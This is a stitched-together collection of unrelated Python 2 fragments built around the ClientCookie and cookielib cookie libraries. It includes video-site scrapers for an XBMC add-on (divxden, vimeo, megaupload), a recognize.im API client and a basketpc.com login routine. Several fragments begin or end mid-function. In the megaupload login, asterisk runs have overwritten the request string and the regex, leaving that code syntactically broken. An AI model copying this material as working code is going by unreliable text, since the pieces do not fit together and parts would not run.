ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = urlvideo #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)' } # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data # Lo pide una segunda vez, como si hubieras hecho click en el banner patron = 'http\:\/\/www\.divxden\.com/([^\/]+)/(.*?)\.html' matches = re.compile(patron, re.DOTALL).findall(url) xbmc.output("[divxden.py] fragmentos de la URL") scrapertools.printMatches(matches) codigo = "" nombre = "" if len(matches) > 0: codigo = matches[0][0] nombre = matches[0][1] txdata = "op=download1&usr_login=&id=" + codigo + "&fname=" + nombre + "&referer=&method_free=Free+Stream" xbmc.output(txdata) req = Request(theurl, txdata, txheaders) handle = urlopen(req) cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() #print data # Extrae el trozo cifrado patron = '<div align="center" id="divxshowboxt">(.*?)</div>' matches = re.compile(patron, re.DOTALL).findall(data) #scrapertools.printMatches(matches) data = "" if len(matches) > 0: data = matches[0] xbmc.output("[divxden.py] bloque packed=" + data) else: return "" # Lo descifra descifrado = unpackerjs.unpackjs(data) # Extrae la URL del vídeo xbmc.output("descifrado=" + descifrado) # Extrae la URL patron = '<param name="src"value="([^"]+)"/>' matches = re.compile(patron, re.DOTALL).findall(descifrado) scrapertools.printMatches(matches) url = "" if len(matches) > 0: url = matches[0] xbmc.output("[divxden.py] url=" + url) return url
def getLoginURLDataResponse(url): request = urllib2.Request(url) request.add_header('Referer', url) request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13') response = ClientCookie.urlopen(request) return response
""" Copyright (c) 2004 Dustin Sallings <*****@*****.**> """ import sys import urllib2 import traceback try: import cookielib cookieJar = cookielib.CookieJar() cookieProcessor = urllib2.HTTPCookieProcessor(cookieJar) openerFactory = urllib2.build_opener except ImportError: import ClientCookie cookieJar = ClientCookie.MozillaCookieJar() cookieProcessor = ClientCookie.HTTPCookieProcessor(cookieJar) openerFactory = ClientCookie.build_opener class ErrorHandler(urllib2.HTTPDefaultErrorHandler): def http_error_default(self, req, fp, code, msg, hdrs): print "*** Got an error %d ***" % (code, ) # print self, req, fp, code, msg, headers return fp if __name__ == '__main__': headers = {'SOAPAction': 'Inform', 'Content-type': 'text/xml'} url = sys.argv[1]
def geturl(urlvideo): videoid = urlvideo # --------------------------------------- # Inicializa la libreria de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass #xbmc.output("ficherocookies %s", ficherocookies) # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = "http://www.vimeo.com/moogaloop/load/clip:%s/local/" % videoid #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3', 'Referer': 'http://vimeo/%s' % urlvideo } # fake a user agent, some websites (like google) don't like automated exploration req = Request(theurl, txdata, txheaders) handle = urlopen(req) #cj.save(ficherocookies) # save the cookies again data = handle.read() handle.close() print data #parseamos el xml en busca del codigo de signatura dom = parseString(data) xml = dom.getElementsByTagName("xml") for node in xml: try: request_signature = getNodeValue( node, "request_signature", "Unknown Uploader").encode("utf-8") request_signature_expires = getNodeValue( node, "request_signature_expires", "Unknown Uploader").encode("utf-8") except: logger.info("Error : Video borrado") return "" try: quality = ((config.getSetting("quality_flv") == "1" and "hd") or "sd") except: quality = "sd" video_url = "http://www.vimeo.com/moogaloop/play/clip:%s/%s/%s/?q=%s" % ( videoid, request_signature, request_signature_expires, quality) print video_url # Timeout del socket a 60 segundos socket.setdefaulttimeout(10) h = urllib2.HTTPHandler(debuglevel=0) request = urllib2.Request(video_url) opener = urllib2.build_opener(h) urllib2.install_opener(opener) try: connexion = opener.open(request) video_url = connexion.geturl() except urllib2.HTTPError, e: xbmc.output("[vimeo.py] error %d (%s) al abrir la url %s" % (e.code, e.msg, video_url)) print e.read()
class recognizeApi(object): """Class to handle requests to recognize.im API. :param client_id: Your unique client ID. You can find it in the Account tab after logging in at recognize.im. :type client_id: str. :param api_key: Your unique API key. You can find it in the Account tab after logging in at recognize.im.. :type api_key: str. :param clapi_key: Your unique secret client key. You can find it in the Account tab after logging in at recognize.im. :type clapi_key: str. :returns: dict -- the server response. """ wsdl = "http://clapi.itraff.pl/wsdl" rest = "http://recognize.im/v2/recognize/" Config.cookieJar = ClientCookie.MozillaCookieJar() def __init__(self, client_id, api_key, clapi_key): self.client_id = client_id self.clapi_key = clapi_key self.api_key = api_key self._server = WSDL.Proxy(self.wsdl, transport = CookieTransport) result = self._server.auth(client_id, clapi_key, None) def convertOutput(self, soap): """Converts SOAPpy.Types.structType to dict. :param soap: The URL to the method you want us to call. :type soap: SOAPpy.Types.structType. :returns: dict -- the server response converted to dict. """ d = {} if type(soap).__name__=='instance' and 'item' in soap._keys(): soap = soap[0] if type(soap).__name__=='list': for i in range(0,len(soap)): if type(soap[i]['value']).__name__=='instance': d[soap[i]['key']] = self.convertOutput(soap[i]['value']) else: d[soap[i]['key']] = soap[i]['value'] elif type(soap).__name__=='instance': d[soap['key']] = soap['value'] return d def imageInsert(self, image_id, image_name, path): """Add new picture to your pictures list :param image_id: A unique identifier of the inserted image. :type image_id: str. :param image_name: A label you want to assign to the inserted image. :type image_name: str. :param path: Path to the image file. :type path: str. :returns: dict -- the server response. """ image = open(path, "rb").read() encoded = base64.b64encode(image) result = self._server.imageInsert(image_id, image_name, encoded); return self.convertOutput(result) def indexBuild(self): """You need to call indexBuild method in order to apply all your recent (from the previous call of this method) changes, including adding new images and deleting images. :returns: dict -- the server response. """ result = self._server.indexBuild() return self.convertOutput(result) def callback(self, callback_url): """There are some situations when we might need to call one of your methods. For example when we finish applying changes we may need to let you know that all your images are ready to be recognized. :param callback_url: The URL to the method you want us to call. :type callback_url: str. :returns: dict -- the server response. """ result = self._server.callback(callback_url) return self.convertOutput(result) def imageDelete(self, image_id): """If you don't need an image to be recognizable anymore you have to remove this image from the database. You can do this by calling imageDelete method passing the ID of the image you want to remove. You can also remove all of your images with one call of this method. In order to achieve this you need to pass null value as a parameter. :param image_id: ID of the image you would like to remove (this is the same ID you pass a an argument to the imageInsert method). Pass null value if you want to remove all of your images. :type image_id: str. :returns: dict -- the server response. """ result = self._server.imageDelete(image_id) return self.convertOutput(result) def imageUpdate(self, image_id, new_image_id, new_image_name): """There may be some situations when you would like to change the name or ID of an image stored in the database. You can do this by calling the imageUpdate method. :param image_id: ID of the image which data you would like to change (this is the same ID you pass a an argument to the imageInsert method). :type image_id: str. :param new_image_id: New ID of an image. :type new_image_id: str. :param new_image_name: New name of an image :type new_image_name: str. :returns: dict -- the server response. """ data = {"id": new_image_id, "name": new_image_name} result = self._server.imageUpdate(image_id, data) return self.convertOutput(result) def indexStatus(self): """You may be curious what is the progress of applying your changes. In order to do this you need to call indexStatus method. :returns: dict -- the server response. """ result = self._server.indexStatus() return self.convertOutput(result) def userLimits(self): """When using our API you are limited with regards the number of images and number of scans (recognition operations). The limits depend on the type of account you have. In order to check how many more images you can add and how many scans you have left use the userLimits method. :returns: dict -- the server response. """ result = self._server.userLimits() return self.convertOutput(result) def imageCount(self): """Returns number of images in your list. :returns: dict -- the server response. """ result = self._server.imageCount() return self.convertOutput(result) def imageGet(self, image_id): """Returns detailed information about image. :param image_id: ID of the image. :type image_id: str. :returns: dict -- the server response. """ result = self._server.imageGet(image_id) return self.convertOutput(result) def modeGet(self): """Returns recognition mode. :returns: dict -- the server response. """ result = self._server.modeGet() return self.convertOutput(result) def modeChange(self, mode): """Changes recognition mode. :returns: dict -- the server response. """ result = self._server.modeChange(mode) return self.convertOutput(result) def recognize(self, path, getAll=False, multi=False, shelf=False): """Sends image recognition request. :param path: Path to the image file. :type path: str. :returns: dict -- the server response. """ #fetch image data size = os.stat(path).st_size / 1024.0 #KB image = Image.open(path) width, height = image.size area = width * height / 10.0**6 #Mpix #check image data if (multi): if (size > MULTIIR_MAX_FILE_SIZE or width < MULTIIR_MIN_DIMENSION or height < MULTIIR_MIN_DIMENSION or area < MULTIIR_MIN_IMAGE_AREA or area > MULTIIR_MAX_IMAGE_AREA): return "Image does not meet the requirements of multi mode query image.\n" elif (shelf): if (size > SHELFIR_MAX_FILE_SIZE or width < SHELFIR_MIN_DIMENSION or height < SHELFIR_MIN_DIMENSION or area < SHELFIR_MIN_IMAGE_AREA or area > SHELFIR_MAX_IMAGE_AREA): return "Image does not meet the requirements of shelf mode query image.\n" else: if (size > SINGLEIR_MAX_FILE_SIZE or width < SINGLEIR_MIN_DIMENSION or height < SINGLEIR_MIN_DIMENSION or area < SINGLEIR_MIN_IMAGE_AREA or area > SINGLEIR_MAX_IMAGE_AREA): return "Image does not meet the requirements of single mode query image.\n" #get url url = self.rest if (multi): url += 'multi/' elif (shelf): url += 'shelf/' else: url += 'single/' if (getAll): url += 'all/' url += self.client_id imageData = open(path, "rb").read() m = hashlib.md5() m.update(self.api_key) m.update(imageData) md5hash = m.hexdigest() headers = { 'content-type':'image/jpeg', 'x-itraff-hash' : md5hash} request = urllib2.Request(url, imageData, headers) response = urllib2.urlopen(request) result = response.read() return ast.literal_eval(result) def drawFrames(self, path, result): """Draws frames on image. :param path: Path to the image file. :type path: str. :param result: Recognition results. :type result: dict. :returns: Image -- Image with frames. """ if (result['status'] == 0): image = Image.open(path) draw = ImageDraw.Draw(image) for obj in result['objects']: loc = obj['location'] draw.line((loc[0]['x'], loc[0]['y'], loc[1]['x'], loc[1]['y']), fill=(255,0,0,255), width=5) draw.line((loc[1]['x'], loc[1]['y'], loc[2]['x'], loc[2]['y']), fill=(255,0,0,255), width=5) draw.line((loc[2]['x'], loc[2]['y'], loc[3]['x'], loc[3]['y']), fill=(255,0,0,255), width=5) draw.line((loc[3]['x'], loc[3]['y'], loc[0]['x'], loc[0]['y']), fill=(255,0,0,255), width=5) return image else: return None
def getmegauploaduser(login, password): # --------------------------------------- # Inicializa la librería de las cookies # --------------------------------------- ficherocookies = COOKIEFILE try: os.remove(ficherocookies) except: pass # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods # --------------------------------- # Instala las cookies # --------------------------------- if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(ficherocookies): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) #print "-------------------------------------------------------" url = "http://www.megaupload.com/?c=login" #print url #print "-------------------------------------------------------" theurl = url # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! passwordesc = password.replace("&", "%26") txdata = "login=1&redir=1&username="******"&password="******"----------------------") xbmc.output("Cookies despues") xbmc.output("----------------------") xbmc.output(cookiedata) xbmc.output("----------------------") ''' patronvideos = 'user="******"]+)"' matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata) if len(matches) == 0: patronvideos = 'user=([^\;]+);' matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata) if len(matches) == 0 and DEBUG: xbmc.output("No se ha encontrado la cookie de Megaupload") xbmc.output("----------------------") xbmc.output("Respuesta de Megaupload") xbmc.output("----------------------") xbmc.output(data) xbmc.output("----------------------") xbmc.output("----------------------") xbmc.output("Cookies despues") xbmc.output("----------------------") xbmc.output(cookiedata) xbmc.output("----------------------") devuelve = "" else: devuelve = matches[0] return devuelve
def read_body_and_headers(url, post=None, headers=[], follow_redirects=False, timeout=None): _log("read_body_and_headers " + url) if post is not None: _log("read_body_and_headers post=" + post) if len(headers) == 0: headers.append([ "User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0" ]) # Start cookie lib ficherocookies = os.path.join(get_data_path(), 'cookies.dat') _log("read_body_and_headers cookies_file=" + ficherocookies) cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: _log("read_body_and_headers importing cookielib") import cookielib except ImportError: _log("read_body_and_headers cookielib no disponible") # If importing cookielib fails # let's try ClientCookie try: _log("read_body_and_headers importing ClientCookie") import ClientCookie except ImportError: _log("read_body_and_headers ClientCookie not available") # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: _log("read_body_and_headers ClientCookie available") # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.MozillaCookieJar() else: _log("read_body_and_headers cookielib available") # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.MozillaCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules _log("read_body_and_headers Cookies enabled") if os.path.isfile(ficherocookies): _log("read_body_and_headers Reading cookie file") # if we have a cookie file already saved # then load the cookies into the Cookie Jar try: cj.load(ficherocookies) except: _log("read_body_and_headers Wrong cookie file, deleting...") os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: _log("read_body_and_headers opener using urllib2 (cookielib)") # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 if not follow_redirects: opener = urllib2.build_opener( urllib2.HTTPHandler(debuglevel=http_debug_log_enabled), urllib2.HTTPCookieProcessor(cj), NoRedirectHandler()) else: opener = urllib2.build_opener( urllib2.HTTPHandler(debuglevel=http_debug_log_enabled), urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: _log("read_body_and_headers opener using ClientCookie") # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) # ------------------------------------------------- # Cookies instaladas, lanza la petición # ------------------------------------------------- # Contador inicio = time.clock() # Diccionario para las cabeceras txheaders = {} # Construye el request if post is None: _log("read_body_and_headers GET request") else: _log("read_body_and_headers POST request") # Añade las cabeceras _log("read_body_and_headers ---------------------------") for header in headers: _log("read_body_and_headers header %s=%s" % (str(header[0]), str(header[1]))) txheaders[header[0]] = header[1] _log("read_body_and_headers ---------------------------") req = Request(str(url), post, txheaders) if timeout is None: handle = urlopen(req) else: #Disponible en python 2.6 en adelante --> handle = urlopen(req, timeout=timeout) #Para todas las versiones: try: import socket deftimeout = socket.getdefaulttimeout() socket.setdefaulttimeout(timeout) handle = urlopen(req) socket.setdefaulttimeout(deftimeout) except: import sys for line in sys.exc_info(): _log("%s" % line) # Actualiza el almacén de cookies cj.save(ficherocookies) # Lee los datos y cierra if handle.info().get('Content-Encoding') == 'gzip': buf = StringIO(handle.read()) f = gzip.GzipFile(fileobj=buf) data = f.read() else: data = handle.read() info = handle.info() _log("read_body_and_headers Response") returnheaders = [] _log("read_body_and_headers ---------------------------") for header in info: _log("read_body_and_headers " + header + "=" + info[header]) returnheaders.append([header, info[header]]) handle.close() _log("read_body_and_headers ---------------------------") ''' # Lanza la petición try: response = urllib2.urlopen(req) # Si falla la repite sustituyendo caracteres especiales except: req = urllib2.Request(url.replace(" ","%20")) # Añade las cabeceras for header in headers: req.add_header(header[0],header[1]) response = urllib2.urlopen(req) ''' # Tiempo transcurrido fin = time.clock() _log("read_body_and_headers Downloaded in %d seconds " % (fin - inicio + 1)) _log("read_body_and_headers body=" + data) return data, returnheaders
import urllib import getopt import httplib import urllib2 from time import sleep from HTMLParser import HTMLParser # if we have Python 2.4's cookielib, use it try: import cookielib policy = cookielib.DefaultCookiePolicy(rfc2965 = True) cookiejar = cookielib.CookieJar(policy) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)).open except ImportError: import ClientCookie # if this is a new ClientCookie, we need to turn on RFC2965 cookies cookiejar = ClientCookie.CookieJar() try: cookiejar.set_policy(ClientCookie.DefaultCookiePolicy(rfc2965 = True)) # install an opener that uses this policy opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cookiejar)) ClientCookie.install_opener(opener) except AttributeError: # must be an old ClientCookie, which already accepts RFC2965 cookies pass opener = ClientCookie.urlopen PROGRAM = sys.argv[0] try: True, False
def getAuthentication(self, user, password): COOKIEFILE = 'cookies.lwp' # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(COOKIEFILE): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(COOKIEFILE) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) values = {'campo_login': user, 'campo_password': password} #We set the user and the pass theurl = 'http://www.basketpc.com/index.php?mod=autentificacion' # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! txdata = urllib.urlencode(values) # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} # fake a user agent, some websites (like google) don't like automated exploration try: req = Request(theurl, txdata, txheaders) # create a request object handle = urlopen(req) # and open it to return a handle on the url except IOError, e: print 'We failed to open "%s".' % theurl if hasattr(e, 'code'): print 'We failed with error code - %s.' % e.code elif hasattr(e, 'reason'): print "The error object has the following 'reason' attribute :" print e.reason print "This usually means the server doesn't exist,'," print "is down, or we don't have an internet connection." sys.exit()